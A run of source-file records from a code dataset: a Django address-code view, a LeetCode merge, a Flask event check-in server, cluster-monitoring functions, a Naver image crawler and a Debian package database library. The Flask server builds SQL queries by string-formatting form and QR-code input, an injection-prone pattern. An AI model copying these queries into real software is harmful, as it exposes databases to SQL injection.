h_address ,s_address)\r\n #db = 1\r\n #list of our number system\r\n alpha = list()\r\n for m in range(48 , 58):\r\n alpha.append(chr(m))\r\n for m in range(65 , 91):\r\n alpha.append(chr(m))\r\n for m in range(97,123):\r\n alpha.append(chr(m))\r\n alpha.append('+')\r\n alpha.append('#')\r\n #--------------------------------------------------------------------------------\r\n #dumpy input\r\n pincode = pincode1\r\n flat = flatno\r\n wing = wingno\r\n building_name = str(building) ##\r\n\r\n conn = sqlite3.connect('address.db')\r\n cur = conn.cursor()\r\n #---------------------------------------------------------------------------------\r\n #For index of pincode in master table\r\n query1 = \"Select pincode from PINS\" #returns tuple of lat and long\r\n print(query1)\r\n p = cur.execute(query1)\r\n plist = p.fetchall()\r\n\r\n #converting tuple to list\r\n pinslist = list()\r\n for i in plist:\r\n if i[0] == 'pincode':\r\n pass\r\n else:\r\n 
pinslist.append(i[0])\r\n\r\n index = 0\r\n for l in pinslist:\r\n if pincode == l:\r\n break\r\n index = index + 1\r\n\r\n flag = 0\r\n for k in range(64):\r\n for j in range(64):\r\n for i in range(64):\r\n if(i + j*64 + k*64*64 == index):\r\n flag = 1\r\n break\r\n if flag == 1:\r\n break\r\n if flag == 1:\r\n break\r\n if(flag == 1):\r\n dcode = str(alpha[k]) + str(alpha[j]) + str(alpha[i])\r\n #------------------------------------------------------------------------------\r\n #for zone of buliding\r\n x = 0\r\n if x == 0:\r\n tablename = \"p\" + str(pincode) + \"zt\"\r\n query8 = \"Select zn,lat,long from \" + tablename + \"\"\" where flatno = :f and wing = :w and buildingno = :b\"\"\"\r\n print(query8,{'f': flat, 'w': wing, 'b': building_name})\r\n z = cur.execute(query8,{'f': flat, 'w': wing, 'b': building_name})\r\n alist = z.fetchall()\r\n\r\n #converting tuple to list\r\n addlist = list()\r\n latlist = list()\r\n longlist = list()\r\n for i in alist:\r\n if i[0] == 'zone':\r\n pass\r\n else:\r\n addlist.append(int(i[0]))\r\n latlist.append(i[1])\r\n longlist.append(i[2])\r\n\r\n zone = addlist[0]\r\n print(zone)\r\n latitude = latlist[0]\r\n longitude = longlist[0] ## #change if f1.py run. change it to zone value from DB browser of that entry\r\n dcode = dcode + str(alpha[zone])\r\n #------------------------------------------------------------------------------\r\n\r\n #for entry in zt\r\n tablename = \"p\" + str(pincode) + \"zt\"\r\n query2 = \"Select * from \" + tablename + \"\"\" where lat = :la and long = :lo and zn = :zo and wing = :w and flatno = :f \"\"\" #returns tuple of lat and long\r\n #print(query2,{'la':18.524174, 'lo':73.865229, 'zo':zone, 'w':1, 'f':2})\r\n a = cur.execute(query2,{'la':latitude, 'lo':longitude, 'zo':zone, 'w':wingno, 'f':flatno})\r\n add = a.fetchall()\r\n addresslist = list()\r\n for i in add:\r\n if i[0] == 'indexno':\r\n pass\r\n else:\r\n addresslist.append(i[0])\r\n index = addresslist[0]\r\n flag = 0\r\n for k in range(64):\r\n for j in range(64):\r\n for i in range(64):\r\n if(i + j*64 + k*64*64 == index):\r\n flag = 1\r\n break\r\n if flag == 1:\r\n break\r\n if flag == 1:\r\n break\r\n if(flag == 1):\r\n dcode = dcode + str(alpha[k]) + str(alpha[j]) + str(alpha[i])\r\n #------------------------------------------------------------------------------\r\n return dcode\r\n","sub_path":"Django/Dcode/newadmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"139707201","text":"# Created by Aashish Adhikari at 7:51 PM 4/25/2020\n\n\ndef merge(nums1, m, nums2, n):\n\n ctr1 = 0\n ctr2 = 0\n idx = 0\n\n import copy\n extra_copy = copy.deepcopy(nums1)\n\n while idx < m + n:\n\n if ctr1 >= m:\n for item in range(ctr2, n):\n nums1[idx] = nums2[item]\n idx += 1\n break\n\n if ctr2 >= n:\n for item in range(ctr1, m):\n nums1[idx] = extra_copy[item]\n idx += 1\n break\n\n if extra_copy[ctr1] < nums2[ctr2]:\n nums1[idx] = extra_copy[ctr1]\n ctr1 += 1\n else:\n nums1[idx] = nums2[ctr2]\n ctr2 += 1\n\n idx += 1\n\n return nums1\nprint(merge([4, 5, 6, 0, 0, 0], 3, [2, 5, 6], 3))\n\n\n\n\n\n\n","sub_path":"LeetCode_Problems/Arrays_101/Merging_Two_Sorted_Arrays_2.py","file_name":"Merging_Two_Sorted_Arrays_2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"571944468","text":"from flask import Flask\nfrom flask import request\nfrom flask import render_template\nfrom flask_cors import CORS\n\nimport cv2\nimport json\nimport numpy as np\nimport mysql.connector\nfrom argparse import ArgumentParser\nfrom PIL import Image\nfrom qrcode import detect_and_decode\n\nparser = ArgumentParser()\nparser.add_argument('--debug', type=int, required=True, help='Debug mode')\nparser.add_argument('--mysql-user', type=str, required=True, help='MySQL username')\nparser.add_argument('--mysql-pwd', type=str, required=True, help='MySQL password')\nargs = vars(parser.parse_args())\n\n### Some constants ###\nPORT=8080\nDEBUG=bool(args['debug'])\n\napp = Flask(__name__)\nCORS(app)\n\ndef _get_mysql_connection():\n\tdb = mysql.connector.connect(\n\t\thost = '127.0.0.1',\n\t\tdatabase = 'dac',\n\t\tuser = args['mysql_user'],\n\t\tpasswd = args['mysql_pwd']\n\t)\n\n\treturn db\n\n@app.route(\"/\")\ndef home():\n return \"
Hello World
\"\n\n@app.route('/list-events', methods=['POST'])\ndef list_events():\n\tconnection = _get_mysql_connection()\n\tcursor = connection.cursor()\n\n\tsql = 'SELECT * FROM events'\n\tcursor.execute(sql)\n\n\tresults = cursor.fetchall()\n\tprint(results)\n\tevents = []\n\n\tfor row in results:\n\t\tevents.append('%s - %s' % (row[0], row[1]))\n\n\tconnection.close()\n\treturn json.dumps(events)\n\n@app.route('/add-participant', methods=['POST'])\ndef add_participant():\n\tconnection = _get_mysql_connection()\n\tcursor = connection.cursor()\n\n\tif(request.method == 'POST'):\n\t\tfirst_name = request.form['first-name']\n\t\tlast_name = request.form['last-name']\n\t\temail = request.form['email']\n\t\tsim_id = request.form['sim-id']\n\t\tevent = request.form['selected_event']\n\t\tevent_id = event.split('-')[0].strip()\n\t\tattended = 0\n\n\t\t# Check if this sim id is registered with this event \n\t\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\t\tcursor.execute(sql)\n\t\tresults = cursor.fetchall()\n\t\tif(cursor.rowcount >= 1): # if repeated registration\n\t\t\t### Delete ###\n\t\t\tprint('[INFO] Repeated registration for sim_id = %s and event_id = %s' % (sim_id, event_id))\n\t\t\tsql = \"DELETE FROM registration WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\t\t\tcursor.execute(sql)\n\t\t\tconnection.commit()\n\n\n\t\t### Insert new record ###\n\t\tsql = 'INSERT INTO registration VALUES (%s, %s, %s, %s, %s, %s)'\n\t\tvalues = (\n\t\t\tfirst_name, last_name, email, sim_id, event_id, attended\n\t\t)\n\n\t\tcursor.execute(sql, values)\n\t\tconnection.commit()\n\t\tconnection.close()\n\n\t\t### Generate qr code and send to participant ###\n\t\t# in data we will have the sim id of the participant and event id\n\t\tqrcode = '%s-%s' % (sim_id, event_id)\n\n\n\t\tif(cursor.rowcount >= 1):\n\t\t\treturn qrcode # 'success'\n\t\telse:\n\t\t\treturn 'failed'\n\n@app.route('/qrcode', methods=['POST'])\ndef qrcode():\n\tif(request.method=='POST'):\n\t\timg = Image.open(request.files['img']).convert('RGB')\n\t\timg = np.array(img)\n\t\timg = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n\n\t\t# print(img)\n\t\trects, data, types = detect_and_decode(img)\n\t\tif(len(rects) < 1):\n\t\t\treturn 'no_code'\n\t\telif(len(rects) > 1):\n\t\t\treturn 'more_than_one'\n\n\t### Check if data is in proper format ###\n\t# in data we will have the sim id of the participant and event id\n\tsplits = data[0].split('-')\n\tif(len(splits) != 2):\n\t\tprint(splits)\n\t\treturn 'invalid_format'\n\telse:\n\t\tsim_id = splits[0]\n\t\tevent_id = splits[1]\n\n\tconnection = _get_mysql_connection()\n\tcursor = connection.cursor()\n\t\n\t### Check if the sim_id and event_id is inside ###\n\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tresults = cursor.fetchall()\n\tif(cursor.rowcount == 0):\n\t\treturn 'not_registered'\n\n\t### Check if sim_id and event_id is inside but attended already ###\n\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s' AND attended=1\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tresults = cursor.fetchall()\n\tif(cursor.rowcount >= 1):\n\t\treturn 'attended'\n\n\t### Find info about participant ###\n\tsql = \"SELECT * FROM registration WHERE sim_id='%s' AND event_id='%s' AND attended=0\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tresults = cursor.fetchall()\n\tinfo = results[0]\n\tresponse = 'success-' + str(info[0]) + '-' + str(info[1]) + '-' + 
str(info[4])\n\n\t### If none of above circumstances, update ###\n\tsql = \"UPDATE registration SET attended=1 WHERE sim_id='%s' AND event_id='%s'\" % (sim_id, event_id)\n\tcursor.execute(sql)\n\tconnection.commit()\n\tconnection.close()\n\n\treturn response\n\n@app.route('/list-participants', methods=['POST'])\ndef list_participants():\n\tif request.method == 'POST':\n\t\tevent_id = request.form['event_id']\n\t\tevent_name = request.form['event_name']\n\n\t\tsql = 'SELECT * FROM registration WHERE event_id=\"%s\"' % event_id\n\t\tconnection = _get_mysql_connection()\n\t\tcursor = connection.cursor()\n\n\t\tcursor.execute(sql)\n\t\tresults = cursor.fetchall()\n\n\t\tparticipants = []\n\t\tfor row in results:\n\t\t\tparticipants.append(row)\n\n\t\tparticipants = json.dumps(participants)\n\n\t\tconnection.close()\n\n\t\treturn participants\n\nif __name__ == '__main__':\n\tif(DEBUG):\n\t\tprint('[INFO] Running in debugging mode ... ')\n\telse:\n\t\tprint('[INFO] Running in deploying mode ... ')\n\n\tapp.run(port=PORT, host='0.0.0.0', debug=DEBUG)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"414338347","text":"import settings\n\n\ndef cal_swap(cluster):\n \"\"\"\n calculate each node's swap usage ratio and store it in node.indicators['swap_ratio']\n \"\"\"\n for node in cluster.nodes:\n if node.states['swap_total'] is None or node.states['swap_used'] is None:\n node.indicators.update({'swap_ratio': None})\n continue\n node.indicators.update({'swap_ratio': node.states['swap_used']/node.states['swap_total']})\n\n\ndef cal_mem(cluster):\n \"\"\"\n calculate each node's memory usage ratio from 'free -m' and store it in node.indicators['mem_ratio']\n calculate each node's memory usage from `top` and store it in node.indicators['ps_mem_ratio']\n calculate whether each node has memory less than settings and store it in node.indicators['mem_less_than_settings']\n \"\"\"\n for node in cluster.nodes:\n if node.states['mem_total'] is None or node.states['mem_used'] is None or node.states['ps'] is None:\n node.indicators.update({'mem_less_than_settings': None})\n node.indicators.update({'mem_ratio': None})\n node.indicators.update({'ps_mem_ratio': None})\n continue\n if not node.states['mem_total'] > settings.MEM[cluster.name][node.name]*(1-settings.MEM_TOL_TOL):\n node.indicators.update({'mem_less_than_settings': True})\n else:\n node.indicators.update({'mem_less_than_settings': False})\n node.indicators.update({'mem_ratio': node.states['mem_used']/node.states['mem_total']})\n cursor = node.states['ps'].cursor()\n cursor.execute('''\n SELECT SUM(mem) FROM process\n '''\n )\n ps_mem = cursor.fetchall()[0][0]\n # SQL may return None if no record is present\n if ps_mem is None:\n ps_mem = 0\n node.indicators.update({'ps_mem_ratio': ps_mem/100.0})\n\n\ndef cal_ps_num(cluster):\n \"\"\"\n calculate each node's number of processes for each user and decide whether they are equal to the number of cpu\n assigned to the job\n the data is stored in node.indicators['not_equal_ps_num'] as {'user': user, 'ps_num': ps_num, 'cpu_num': cpu_num}\n also, check whether a node is assigned to a job but no processes are present and store it in\n node.indicators['no_ps'] as ['wangc', 'liuyz']\n \"\"\"\n for node in cluster.nodes:\n if node.states['ps'] is None or cluster.states['jobs'] is None or cluster.states['stime'] is None or \\\n node.states['users'] is None:\n node.indicators.update({'not_equal_ps_num': None})\n node.indicators.update({'no_ps': None})\n continue\n job_cursor = cluster.states['jobs'].cursor()\n node.indicators.update({'not_equal_ps_num': []})\n node.indicators.update({'no_ps': []})\n ps_cursor = node.states['ps'].cursor()\n # check whether job changes when cluster manager is running. If true, abort the calculation\n job_cursor.execute('''\n SELECT job_id, owner, state FROM job\n WHERE node = ? AND mtime >= ?\n ''',\n (node.name, cluster.states['stime'] - settings.TIME_DELTA)\n )\n if job_cursor.fetchall():\n continue\n # start checking ps number\n for user in settings.USERS:\n ps_cursor.execute('''\n SELECT COUNT(*) FROM process\n WHERE owner=?\n ''',\n (user,)\n )\n ps_num = ps_cursor.fetchall()[0][0]\n \"\"\"\n ps_cursor.execute('''\n SELECT DISTINCT command FROM process\n WHERE owner=?\n ''',\n (user,)\n )\n # command would be ['vasp', 'abinit']\n command = [record[0] for record in ps_cursor.fetchall()]\n \"\"\"\n job_cursor.execute('''\n SELECT SUM(cpu_num) FROM job\n WHERE owner=? AND node = ? 
AND state = ?\n ''',\n (user, node.name, 'R')\n )\n cpu_num = job_cursor.fetchall()[0][0]\n if cpu_num is None:\n cpu_num = 0\n # only one process existing possibly means the program is single-threaded\n if ps_num != cpu_num and ps_num != 1:\n node.indicators['not_equal_ps_num'] += [{'user': user, 'ps_num': ps_num, 'cpu_num': cpu_num}]\n\n if cpu_num > 0 and (user not in node.states['users']):\n node.indicators['no_ps'] += [user]\n \"\"\"\n job_cursor.execute('''\n SELECT SUM(process_num) FROM job\n WHERE owner=? AND node = ? AND stime <= ? AND ftime <= ? AND ftime >= ?\n ''',\n (user, node.name, node.states['ps_time'], node.states['ps_time']+settings.FTIME_DELTA,\n node.states['ps_time']-settings.FTIME_DELTA)\n )\n job_ps_num_fdelta = job_cursor.fetchall()[0][0]\n if job_ps_num_fdelta is None:\n job_ps_num_fdelta = 0\n job_cursor.execute('''\n SELECT SUM(process_num) FROM job\n WHERE owner=? AND node = ? AND stime <= ? AND stime >= ? AND ftime >= ?\n ''',\n (user, node.name, node.states['ps_time']+settings.STIME_DELTA,\n node.states['ps_time']-settings.STIME_DELTA, node.states['ps_time'])\n )\n job_ps_num_sdelta = job_cursor.fetchall()[0][0]\n if job_ps_num_sdelta is None:\n job_ps_num_sdelta = 0\n # SQL may return None if no such job exists\n if job_ps_num is None:\n job_ps_num = 0\n job_ps_num_delta = job_ps_num_fdelta + job_ps_num_sdelta\n\n if actual_ps_num > job_ps_num + job_ps_num_delta or actual_ps_num < job_ps_num - job_ps_num_delta:\n node.indicators['not_equal_ps_num'] += [{'user': user, 'actual_ps_num': actual_ps_num,\n 'job_ps_num': job_ps_num, 'command': command,\n 'job_ps_num_delta': job_ps_num_delta, }]\n\n \"\"\"\n\n\ndef cal_waiting_process(cluster):\n \"\"\"\n check each node for process busy for IO and store it in node.indicators['waiting_process']\n \"\"\"\n for node in cluster.nodes:\n if node.states['ps'] is None:\n node.indicators.update({'waiting_process': None})\n continue\n node.indicators.update({'waiting_process': []})\n cursor = node.states['ps'].cursor()\n cursor.execute('''\n SELECT owner, state, cpu FROM process\n WHERE state=?\n ''',\n ('D',)\n )\n ps = cursor.fetchall()\n for process in ps:\n node.indicators['waiting_process'] += [{'user': process[0], 'state': process[1], 'cpu': process[2]}]\n\n\ndef cal_connection(cluster):\n \"\"\"\n check whether the nodes are connected and store it in node.indicators['is_connected']\n \"\"\"\n if cluster.states['jobs'] is None:\n cluster.indicators.update({'is_connected': False})\n else:\n cluster.indicators.update({'is_connected': True})\n for node in cluster.nodes:\n if node.states['ps'] is None:\n node.indicators.update({'is_connected': False})\n else:\n node.indicators.update({'is_connected': True})\n\n\ndef cal_users(cluster):\n \"\"\"\n calculate all the users in each node and store it in node.indicators['users'].\n the format is like ['swj', 'wangc']\n \"\"\"\n for node in cluster.nodes:\n if node.states['users'] is None or cluster.states['jobs'] is None:\n node.indicators.update({'users': None, 'job_users': None})\n continue\n node.indicators.update({'users': node.states['users']})\n cursor = cluster.states['jobs'].cursor()\n cursor.execute('''\n SELECT job_id, owner, state FROM job\n WHERE node = ? 
AND state = ?\n ''',\n (node.name, 'R')\n )\n node.indicators.update({'job_users': [item[1] for item in cursor.fetchall()]})\n node.indicators['job_users'] = list(set(node.indicators['job_users']))\n\n","sub_path":"cal_indi.py","file_name":"cal_indi.py","file_ext":"py","file_size_in_byte":8505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"563748007","text":"'''\n네이버에서 50장 가져오는건데 이 크롤러는 별로 안좋아보임\n'''\n\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.parse import quote_plus\n\nbaseUrl = 'https://search.naver.com/search.naver?where=image&sm=tab_jum&query='\nplusUrl = input('검색어를 입력하세요 : ')\nurl = baseUrl + quote_plus(plusUrl)\n\nhtml = urlopen(url).read()\nsoup = bs(html, \"html.parser\")\nimg = soup.find_all(class_='_img')\n\nprint(img[0])\n\nn = 1\nfor i in img:\n imgUrl = i['data-source']\n with urlopen(imgUrl) as f:\n with open(plusUrl+str(n) + '.jpg', 'wb') as h:\n img = f.read()\n h.write(img)\n n += 1\n\nprint('다운로드완료')\n\n\n","sub_path":"PYTHON/KERAS_Test/crawlingtest01.py","file_name":"crawlingtest01.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"266549862","text":"###\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2007,2008, Mike O'Connor\n# Copyright (c) 2010-2011 Stuart Prescott\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions, and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions, and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author of this software nor the name of\n# contributors to this software may be used to endorse or promote products\n# derived from this software without specific prior written consent.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES LOSS OF USE, DATA, OR PROFITS OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n###\n\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport re\nimport psycopg2\nimport psycopg2.extras\nfrom psycopg2.extensions import adapt\n\nfrom .relations import *\nfrom . 
import data\n\n\nclass Release(object):\n \"\"\" Class that represents the contents of a release\n i.e lists of binary and source packages \"\"\"\n def __init__(self, dbconn, arch=None, release=None, pins=None):\n self.dbconn = dbconn\n self.arch = arch\n if self.arch is None:\n self.arch = data.DebianData.default_arch\n if release is None:\n release = data.DebianData.stable_release\n if type(release) is tuple:\n self.release = release\n elif type(release) is list:\n self.release = tuple(release)\n else:\n self.release = (release,)\n self.pins = pins\n self.cache = {}\n self.scache = {}\n\n def Package(self, package, version=None, operator=None):\n \"\"\"Look up a binary package by name in the current release.\n package: name of the package (string)\n returns Package object\n \"\"\"\n phash = self._mkpackagehash(package, operator, version)\n if not phash in self.cache:\n self.cache[phash] = Package(self.dbconn, arch=self.arch, \\\n release=self.release, package=package, \\\n pins=self.pins,\n version=version, operator=operator)\n return self.cache[phash]\n\n def Source(self, package, autoBin2Src=True, version=None, operator=None):\n \"\"\"Look up a source package by name in the current release.\n package: name of the package (string)\n autoBin2Src: (default true) convert names of binary packages to\n source packages automatically if needed\n returns Package object\n \"\"\"\n phash = self._mkpackagehash(package, operator, version)\n if not phash in self.scache:\n self.scache[phash] = SourcePackage(self.dbconn, arch=self.arch, \\\n release=self.release, package=package,\n pins=self.pins,\n version=version, operator=operator)\n if autoBin2Src and not self.scache[phash].Found():\n p = self.bin2src(package)\n return self.Source(p, False)\n if not self.scache[phash].Found():\n raise PackageNotFoundError(package)\n return self.scache[phash]\n\n def bin2src(self, package):\n \"\"\"Returns the source package for a given binary package\"\"\"\n c = self.dbconn.cursor()\n c.execute(r\"\"\"SELECT source\n FROM packages\n WHERE package=%(package)s\n AND release IN %(release)s LIMIT 1\"\"\",\n dict(package=package,\n release=self.release))\n row = c.fetchone()\n if row:\n return row[0]\n else:\n raise PackageNotFoundError(package)\n\n def arch_applies(self, proposed):\n def kern_arch_split(archspec):\n if '-' in archspec:\n return archspec.split(\"-\")\n else:\n return (\"linux\", archspec)\n\n if proposed == self.arch or proposed == \"all\":\n return True\n\n (pkern, parch) = kern_arch_split(proposed)\n (skern, sarch) = kern_arch_split(self.arch)\n\n if pkern == \"any\":\n return sarch == parch\n if parch == \"any\":\n return skern == pkern\n return parch == sarch and pkern == skern\n\n def _mkpackagehash(self, package, operator, version):\n return \"%s|%s|%s\" % (package, operator, version)\n\n def __str__(self):\n return \"Release: %s.\\n\" \\\n \"\\t%d binary packages and %d source packages in cache.\" % \\\n (self.release, len(self.cache), len(self.scache))\n\n\nclass AbstractPackage(object):\n fields = ['*']\n table = ''\n column = ''\n pins = []\n data = []\n\n def __init__(self, dbconn, arch=None, release=None, package=None,\n pins=None, version=None, operator=None):\n \"\"\"\n Bind a specified binary or source package.\n\n A single release or a list or tuple of releases can be used. If more\n than one release is given, a set of pins giving the priority of the\n different releases in searching for packages can be specified. 
The pins\n should be a dict of releasename => pin value where higher values are\n preferred. In the absence of any specified pins, all releases are\n treated equally, meaning that the most recent package version will be\n chosen.\n\n Note that the \"pinning\" used here is a very simple rank order not the\n sophisticated system used by apt as described in apt_preferences(5).\n \"\"\"\n if not package:\n raise ValueError(\"Package name not specified\")\n# if type(package) is Package:\n# return package\n if not isinstance(package, str) and not isinstance(package, unicode):\n raise ValueError(\"What did you do to 'package'? It was a %s\" % \\\n type(package))\n self.dbconn = dbconn\n self.arch = arch\n if self.arch is None:\n self.arch = data.DebianData.default_arch\n if release is None:\n release = data.DebianData.stable_release\n if type(release) is tuple:\n self.release = release\n elif type(release) is list:\n self.release = tuple(release)\n else:\n self.release = (release,)\n self.package = package\n if pins and not type(pins) is dict:\n raise ValueError(\"List of pins must be a dict mapping the \"\n \"release name to its relative importance.\")\n self.pins = pins\n self.version = version\n self.operator = operator\n self._Fetch()\n\n def _Fetch(self):\n c = self.dbconn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n f = ','.join(self.fields)\n pin = ''\n if self.pins and self.release:\n pin = \"pin DESC, \"\n cases = [\"WHEN release = %s THEN %s\" % \\\n (adapt(r), adapt(self.pins[r])) \\\n for r in self.pins.keys()]\n f += \", CASE %s ELSE 0 END AS pin\" % ' '.join(cases)\n verwhere = \"\"\n if self.version and self.operator:\n verwhere = \"AND version %s debversion(%s)\" % \\\n (self.operator.replace('>>', '>').replace('<<', '<'),\n adapt(self.version))\n c.execute(r\"\"\"SELECT \"\"\" + f + \"\"\"\n FROM \"\"\" + self.table + \"\"\"\n WHERE \"\"\" + self.column + \"\"\"=%(package)s\n AND (architecture='all' OR architecture=%(arch)s)\n AND release IN %(release)s \"\"\" + verwhere + \"\"\"\n ORDER BY \"\"\" + pin + \"\"\"version DESC\n LIMIT 1\"\"\",\n dict(package=self.package,\n arch=self.arch,\n release=self.release))\n self.data = c.fetchone()\n\n def Found(self):\n '''Does the package exist in the database for the release specified?\n\n For binary packages this is equivalent to:\n \"Is the package a real package?\"\n (returns false for packages that are only virtual packages)'''\n return self.data != None\n\n def RelationEntry(self, relation, combinePreDepends=True):\n if not self.Found():\n raise PackageNotFoundError(self.package)\n if relation == 'depends' and combinePreDepends:\n rs = [self.data['depends'], self.data['pre_depends']]\n return \",\".join(filter(None, rs))\n return self.data[relation]\n\n def RelationshipOptionsList(self, relation, combinePreDepends=True):\n rels = RelationshipOptionsList()\n l = self.RelationEntry(relation, combinePreDepends)\n if l:\n for r in re.split(r\"\\s*,\\s*\", l):\n roptions = RelationshipOptions(r)\n rels.append(roptions)\n return rels\n\n\nclass Package(AbstractPackage):\n def __init__(self, dbconn, arch=None, release=None, package=None,\n pins=None, version=None, operator=None):\n \"\"\"\n Bind a specified binary package from a releases, list of releases\n or tuple of releases\n\n \"\"\"\n self.table = 'packages'\n self.column = 'package'\n self._ProvidersList = None\n self.installable = None\n AbstractPackage.__init__(self, dbconn, arch, release, package,\n pins=pins, version=version, operator=operator)\n\n def IsVirtual(self):\n 
\"\"\"Test if the package is a virtual package.\n\n Tests to see if any package Provides the current package\n \"\"\"\n return len(self.ProvidersList()) > 0\n\n def IsVirtualOnly(self):\n \"\"\"Test if the package is a (purely) virtual package.\"\"\"\n return not self.Found() and self.IsVirtual()\n\n def IsAvailable(self):\n return self.Found() or self.IsVirtual()\n\n def ProvidersList(self):\n if self._ProvidersList == None:\n # remove all characters from the package name that aren't legal in\n # a package name i.e. not in:\n # a-z0-9-.+\n # see §5.6.1 of Debian Policy \"Source\" for details.\n # http://www.debian.org/doc/debian-policy/ch-controlfields.html#s-f-Source\n #\n # \\m is start word boundary, \\M is finish word boundary\n # (but - in package name is a word boundary)\n # \\A is start string, \\Z is finish string\n # http://www.postgresql.org/docs/8.3/static/functions-matching.html\n packagere = r\"(?:\\A|[, ])%s(?:\\Z|[, ])\" % \\\n re.escape(re.sub(r\"[^a-z\\d\\-+.]\", \"\", self.package))\n # print(packagere)\n c = self.dbconn.cursor()\n c.execute(r\"\"\"SELECT DISTINCT package\n FROM packages\n WHERE provides ~ %(package)s\n AND (architecture='all' OR architecture=%(arch)s)\n AND release IN %(release)s\"\"\",\n dict(package=packagere,\n arch=self.arch,\n release=self.release))\n pkgs = []\n for row in c.fetchall():\n pkgs.append(row[0])\n self._ProvidersList = pkgs\n return self._ProvidersList\n\n def PreDepends(self):\n return self.RelationEntry('pre_depends')\n\n def PreDependsList(self):\n return self.RelationshipOptionsList('pre_depends')\n\n def Depends(self, combinePreDepends=True):\n return self.RelationEntry('depends', combinePreDepends)\n\n def DependsList(self, combinePreDepends=True):\n return self.RelationshipOptionsList('depends', combinePreDepends)\n\n def Recommends(self):\n return self.RelationEntry('recommends')\n\n def RecommendsList(self):\n return self.RelationshipOptionsList('recommends')\n\n def Suggests(self):\n return self.RelationEntry('suggests')\n\n def SuggestsList(self):\n return self.RelationshipOptionsList('suggests')\n\n def Enhances(self):\n return self.RelationEntry('enhances')\n\n def EnhancesList(self):\n return self.RelationshipOptionsList('enhances')\n\n def Conflicts(self):\n return self.RelationEntry('conflicts')\n\n def ConflictsList(self):\n return self.RelationshipOptionsList('conflicts')\n\n def Breaks(self):\n return self.RelationEntry('breaks')\n\n def BreaksList(self):\n return self.RelationshipOptionsList('breaks')\n\n def Replaces(self):\n return self.RelationEntry('replaces')\n\n def ReplacesList(self):\n return self.RelationshipOptionsList('replaces')\n\n def __str__(self):\n return \"Package %s on %s in release %s\" % \\\n (self.package, self.arch, self.release)\n\n\nclass SourcePackage(AbstractPackage):\n def __init__(self, dbconn, arch=None, release=None, package=None,\n pins=None, version=None, operator=None):\n #self.fields = ['build_depends', 'build_depends_indep', 'version']\n self.table = 'sources'\n self.column = 'source'\n #self.autobin2src = kwargs.get('bin2src', True)\n AbstractPackage.__init__(self, dbconn, arch, release, package,\n pins=pins, version=version, operator=operator)\n\n def _Fetch(self):\n c = self.dbconn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n f = ','.join(self.fields)\n c.execute(r\"\"\"SELECT \"\"\" + f + \"\"\"\n FROM \"\"\" + self.table + \"\"\"\n WHERE \"\"\" + self.column + \"\"\"=%(package)s\n AND release IN %(release)s\n ORDER BY version DESC\n LIMIT 1\"\"\",\n 
dict(package=self.package,\n release=self.release))\n self.data = c.fetchone()\n\n def Binaries(self):\n c = self.dbconn.cursor()\n c.execute(r\"\"\"SELECT DISTINCT package\n FROM packages\n WHERE source=%(package)s\n AND release IN %(release)s\"\"\",\n dict(package=self.package,\n arch=self.arch,\n release=self.release))\n pkgs = []\n for row in c.fetchall():\n pkgs.append(row[0])\n return pkgs\n\n def BuildDepends(self):\n return self.RelationEntry('build_depends')\n\n def BuildDependsList(self):\n return self.RelationshipOptionsList('build_depends')\n\n def BuildDependsIndep(self):\n return self.RelationEntry('build_depends_indep')\n\n def BuildDependsIndepList(self):\n return self.RelationshipOptionsList('build_depends_indep')\n\n\nclass PackageNotFoundError(LookupError):\n \"\"\"Exception raised when a package is assumed to exist but doesn't\"\"\"\n\n def __init__(self, package):\n self.package = package\n\n def __str__(self):\n return \"Package was not found: %s\" % 